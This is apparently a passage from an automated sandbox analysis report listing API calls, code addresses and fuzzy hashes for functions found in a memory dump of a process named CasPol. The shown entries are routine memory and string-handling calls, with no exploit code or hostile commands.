                                                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendmemset
                                                                                                                  • String ID: F^@
                                                                                                                  • API String ID: 568519121-3652327722
                                                                                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PlacementWindowmemset
                                                                                                                  • String ID: WinPos
                                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1860491036-0
                                                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040A908
                                                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 726966127-0
                                                                                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 726966127-0
                                                                                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
• Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
• Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
• Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
• Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
• Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
• Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
• Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5